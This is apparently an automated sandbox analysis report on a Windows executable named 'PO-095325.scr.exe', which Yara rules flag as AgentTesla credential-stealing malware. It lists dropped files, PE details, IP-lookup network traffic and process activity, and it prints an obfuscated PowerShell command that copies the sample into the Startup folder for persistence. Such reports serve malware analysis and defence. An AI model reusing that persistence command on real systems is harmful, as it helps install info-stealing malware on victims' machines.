                                                                      SHA-512:E4883A838C8DD48AFB6CDD1C487DC74EA0B7C4A23E6D74A0BAF7736C4D3E48427B951E632D4793A1EFEEA63DE752CE0506BCFDC45B3D1689AC86FB2405A96E7F
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                      Download File
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xf6d8adac, page size 16384, Windows version 10.0
                                                                      Category:dropped
                                                                      Size (bytes):1310720
                                                                      Entropy (8bit):0.6584532953534723
                                                                      Encrypted:false
                                                                      SSDEEP:1536:RSB2ESB2SSjlK/AxrO1T1B0CZSJWYkr3g16n2UPkLk+kdbI/0uznv0M1Dn/didMV:Raza6xhzA2U8HDnAPZ4PZf9h/9h
                                                                      MD5:E8B87D35C32807784E47D5D4F49514D2
                                                                      SHA1:0014112860192B2C8E69620EE74F33C4CAC5691F
                                                                      SHA-256:D6865E96624B97ED51DB1D987C57F780B22712C199C9295CB9610D0F0ACEE7CE
                                                                      SHA-512:BF691ECDF0BB5B8BA8099C838974CBBDE1841BD7E92A89F245146393C2C14FB52BD9E0A5BC59C5816E4267D64CCD92E0146AFA3272CBDBB37EB613CBF13DAF9A
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:...... ...............X\...;...{......................T.~..........|..;....|..h.|..........|..T.~.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..................................>.q.....|....................i.....|...........................#......T.~.....................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                      Download File
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):16384
                                                                      Entropy (8bit):0.0799903774938407
                                                                      Encrypted:false
                                                                      SSDEEP:3:yc1OetYepGwVNP6LhZnqG4lltknZoll58Kgvvl/QoeP/ll:yUrzpvU/q1lUnCz8KgR+t
                                                                      MD5:F0314870666DEDF32912D27F41F6D3C9
                                                                      SHA1:FFC47EA63C4B4427BEB6F78CF858001BED1BF592
                                                                      SHA-256:FE6DAEAF1B291EDCC0B97E15179D83E7CA75ABC7A12703887ABCF4D1F654EFAC
                                                                      SHA-512:8113400FE49DDABAD7060AEA12F7E2A2B6DDF18487ADD374B86ADA6CC955E87CF3D22EAA76C9888F0C7038EA7B87750A18D16AFB96131F30B77F57A45DA9725D
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:.9.......................................;...{..;....|.......|...............|.......|...g.F.....|.....................i.....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-095325.scr.exe.log

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\PO-095325.scr.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1216
                                                                      Entropy (8bit):5.34331486778365
                                                                      Encrypted:false
                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):1.1510207563435464
                                                                      Encrypted:false
                                                                      SSDEEP:3:NlllulTkklh:NllUokl
                                                                      MD5:8F489B5B8555D6E9737E8EE991AA32FD
                                                                      SHA1:05B412B1818DDB95025A6580D9E1F3845F6A2AFC
                                                                      SHA-256:679D924F42E8FC107A7BE221DE26CCFEBF98633EA2454D3B4E0D82ED66E3E03D
                                                                      SHA-512:97521122A5B64237EF3057A563284AC5C0D3354E8AC5AA0DE2E2FA61BA63379091200D1C4A36FABC16B049E83EF11DBB62E1987A6E4D6A4BCD5DDB27E7BD9F49
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:@...e................................................@..........

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bby2xb0d.scu.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lvbxtp5v.tvb.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmkgnilv.5rb.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zf23jsrj.ygd.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                      Download File
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):55
                                                                      Entropy (8bit):4.306461250274409
                                                                      Encrypted:false
                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                      Malicious:false
                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.5999537682362295
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      File name:PO-095325.scr.exe
                                                                      File size:578'048 bytes
                                                                      MD5:93f87d1e11c67dbc47ff98369811e826
                                                                      SHA1:b407b411806659a874ce20d38b62c891703a4bce
                                                                      SHA256:16043cbb08a362ab425145ded9447bcc382c2b9c9eb3b570704edabbe4276fea
                                                                      SHA512:efec7ded450a9c5bd8aa5de3b7f30a0df3af003303f4f394c6e9169c0c851f882e51c357c8a865acb9084f05b7d112c50f6d8af756be7e1c4362d3ff9721a218
                                                                      SSDEEP:6144:adD9YbLuzSyYVeYrmsmERAOU4CmhqQ+cIxJF33hnaoSGCjc/PmKFDq90h5VWSD2w:arrAwXdERU4LxBUzAVc/PmKe0D
                                                                      TLSH:21C4AFC2309455D6E86A44F1BC09DCA039EB35AFD6B2A98DBA97D61FC0A3313051B53F
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....3...............0..j...f........... ........@.. .......................@............@................................

                                                                      File Icon

                                                                      Icon Hash:0819111189111919

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x4588de
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0xC933C395 [Sat Dec 19 14:13:41 2076 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      jmp dword ptr [00402000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x588840x57.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x5a0000x362ee.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x920000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x20000x568e40x56a00a4bb84d82684373ba869857a2fe221edFalse0.9098941423160173data7.959717171479094IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x5a0000x362ee0x36400049d770c06acafd72ecb8dba71c6d875False0.47095514112903225data6.3453512496293625IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x920000xc0x200497fa2e8416b1e8c83a0f66cefe8d96dFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_ICON0x5a2b00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 4724 x 4724 px/m0.3980496453900709
                                                                      RT_ICON0x5a7180x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 4724 x 4724 px/m0.4110655737704918
                                                                      RT_ICON0x5b0a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 4724 x 4724 px/m0.3946998123827392
                                                                      RT_ICON0x5c1480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 4724 x 4724 px/m0.34937759336099583
                                                                      RT_ICON0x5e6f00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 4724 x 4724 px/m0.32605101558809635
                                                                      RT_ICON0x629180x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 4724 x 4724 px/m0.30873382624768947
                                                                      RT_ICON0x67da00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 4724 x 4724 px/m0.2748843809123397
                                                                      RT_ICON0x712480x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 4724 x 4724 px/m0.2540222406246303
                                                                      RT_ICON0x81a700xe32bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced1.0004470810764337
                                                                      RT_GROUP_ICON0x8fd9c0x84data0.7121212121212122
                                                                      RT_VERSION0x8fe200x2e4data0.4391891891891892
                                                                      RT_MANIFEST0x901040x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                      Imports

                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain

                                                                      Network Behavior

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Apr 19, 2024 17:13:59.913619041 CEST49707443192.168.2.5104.26.12.205
                                                                      Apr 19, 2024 17:13:59.913671017 CEST44349707104.26.12.205192.168.2.5
                                                                      Apr 19, 2024 17:13:59.913741112 CEST49707443192.168.2.5104.26.12.205
                                                                      Apr 19, 2024 17:13:59.920380116 CEST49707443192.168.2.5104.26.12.205
                                                                      Apr 19, 2024 17:13:59.920397043 CEST44349707104.26.12.205192.168.2.5
                                                                      Apr 19, 2024 17:14:00.155541897 CEST44349707104.26.12.205192.168.2.5
                                                                      Apr 19, 2024 17:14:00.155647993 CEST49707443192.168.2.5104.26.12.205
                                                                      Apr 19, 2024 17:14:00.160696983 CEST49707443192.168.2.5104.26.12.205
                                                                      Apr 19, 2024 17:14:00.160716057 CEST44349707104.26.12.205192.168.2.5
                                                                      Apr 19, 2024 17:14:00.161117077 CEST44349707104.26.12.205192.168.2.5
                                                                      Apr 19, 2024 17:14:00.204627037 CEST49707443192.168.2.5104.26.12.205
                                                                      Apr 19, 2024 17:14:00.264291048 CEST49707443192.168.2.5104.26.12.205
                                                                      Apr 19, 2024 17:14:00.312160015 CEST44349707104.26.12.205192.168.2.5
                                                                      Apr 19, 2024 17:14:00.462399960 CEST44349707104.26.12.205192.168.2.5
                                                                      Apr 19, 2024 17:14:00.462532997 CEST44349707104.26.12.205192.168.2.5
                                                                      Apr 19, 2024 17:14:00.462757111 CEST49707443192.168.2.5104.26.12.205
                                                                      Apr 19, 2024 17:14:00.469672918 CEST49707443192.168.2.5104.26.12.205
                                                                      Apr 19, 2024 17:14:00.587901115 CEST4970880192.168.2.5208.95.112.1
                                                                      Apr 19, 2024 17:14:00.704478025 CEST8049708208.95.112.1192.168.2.5
                                                                      Apr 19, 2024 17:14:00.704591036 CEST4970880192.168.2.5208.95.112.1
                                                                      Apr 19, 2024 17:14:00.704782963 CEST4970880192.168.2.5208.95.112.1
                                                                      Apr 19, 2024 17:14:00.831845999 CEST8049708208.95.112.1192.168.2.5
                                                                      Apr 19, 2024 17:14:00.876555920 CEST4970880192.168.2.5208.95.112.1
                                                                      Apr 19, 2024 17:15:12.861227036 CEST8049708208.95.112.1192.168.2.5
                                                                      Apr 19, 2024 17:15:12.861300945 CEST4970880192.168.2.5208.95.112.1
                                                                      Apr 19, 2024 17:15:40.472063065 CEST4970880192.168.2.5208.95.112.1
                                                                      Apr 19, 2024 17:15:40.588272095 CEST8049708208.95.112.1192.168.2.5

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Apr 19, 2024 17:13:59.800477028 CEST5397753192.168.2.51.1.1.1
                                                                      Apr 19, 2024 17:13:59.906311989 CEST53539771.1.1.1192.168.2.5
                                                                      Apr 19, 2024 17:14:00.482700109 CEST5103453192.168.2.51.1.1.1
                                                                      Apr 19, 2024 17:14:00.587018967 CEST53510341.1.1.1192.168.2.5

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Apr 19, 2024 17:13:59.800477028 CEST192.168.2.51.1.1.10xaf01Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                      Apr 19, 2024 17:14:00.482700109 CEST192.168.2.51.1.1.10xa8a3Standard query (0)ip-api.comA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Apr 19, 2024 17:13:59.906311989 CEST1.1.1.1192.168.2.50xaf01No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                      Apr 19, 2024 17:13:59.906311989 CEST1.1.1.1192.168.2.50xaf01No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                      Apr 19, 2024 17:13:59.906311989 CEST1.1.1.1192.168.2.50xaf01No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                      Apr 19, 2024 17:14:00.587018967 CEST1.1.1.1192.168.2.50xa8a3No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • api.ipify.org
                                                                      • ip-api.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.549708208.95.112.1801992C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Apr 19, 2024 17:14:00.704782963 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                                                      Host: ip-api.com
                                                                      Connection: Keep-Alive
                                                                      Apr 19, 2024 17:14:00.831845999 CEST174INHTTP/1.1 200 OK
                                                                      Date: Fri, 19 Apr 2024 15:14:00 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 5
                                                                      Access-Control-Allow-Origin: *
                                                                      X-Ttl: 60
                                                                      X-Rl: 44
                                                                      Data Raw: 74 72 75 65 0a
                                                                      Data Ascii: true


                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.549707104.26.12.2054431992C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-04-19 15:14:00 UTC155OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                      Host: api.ipify.org
                                                                      Connection: Keep-Alive
                                                                      2024-04-19 15:14:00 UTC211INHTTP/1.1 200 OK
                                                                      Date: Fri, 19 Apr 2024 15:14:00 GMT
                                                                      Content-Type: text/plain
                                                                      Content-Length: 12
                                                                      Connection: close
                                                                      Vary: Origin
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Server: cloudflare
                                                                      CF-RAY: 876dd7801eae4554-ATL
                                                                      2024-04-19 15:14:00 UTC12INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
                                                                      Data Ascii: 81.181.57.52


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:17:13:56
                                                                      Start date:19/04/2024
                                                                      Path:C:\Users\user\Desktop\PO-095325.scr.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\PO-095325.scr.exe"
                                                                      Imagebase:0x4e0000
                                                                      File size:578'048 bytes
                                                                      MD5 hash:93F87D1E11C67DBC47FF98369811E826
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:2
                                                                      Start time:17:13:57
                                                                      Start date:19/04/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"Powershell.exe" ??????????-??????????E??????????x??????????e??????????c??????????u??????????t??????????i??????????o??????????n??????????P??????????o??????????l??????????i??????????c??????????y?????????? ??????????B??????????y??????????p??????????a??????????s??????????s?????????? ??????????-??????????c??????????o??????????m??????????m??????????a??????????n??????????d ?????????C?????????o?????????p?????????y?????????-?????????I?????????t?????????e?????????m 'C:\Users\user\Desktop\PO-095325.scr.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\command-line.exe'
                                                                      Imagebase:0x10000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:3
                                                                      Start time:17:13:57
                                                                      Start date:19/04/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
